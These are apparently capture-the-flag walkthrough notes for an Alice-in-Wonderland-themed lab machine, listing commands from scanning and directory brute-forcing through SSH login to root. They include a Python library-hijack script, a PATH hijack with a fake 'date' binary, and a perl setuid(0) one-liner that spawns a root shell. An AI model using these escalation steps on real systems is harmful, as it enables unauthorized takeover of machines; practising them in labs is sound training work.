1 - nmap -A 10.10.106.74
2 - gobuster dir -u http://10.10.106.74 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
3 - view-source:http://10.10.106.74/r/a/b/b/i/t
4 - ssh alice@10.10.106.74
5 - cat /root/user.txt
6 - sudo -l 
7 - cat > random.py << EOF (PYTHON PATH INJECTION)
import os
os.system("/bin/bash")

8 - chmod +x random.py
8 - sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
9 - cd /home/rabbit
10 - ltrace ./teaParty
11 - strace ./teaParty
12 - cat > date << EOF
#!/bin/bash
/bin/bash

13 - chmod +x date
14 - export PATH=/home/rabbit:$PATH
14 - ./teaParty
15 - cat /home/hatter/password.txt
16 - getcap -r / 2>/dev/null (perl)
17 - perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
18 - cat /home/alice/root.txt
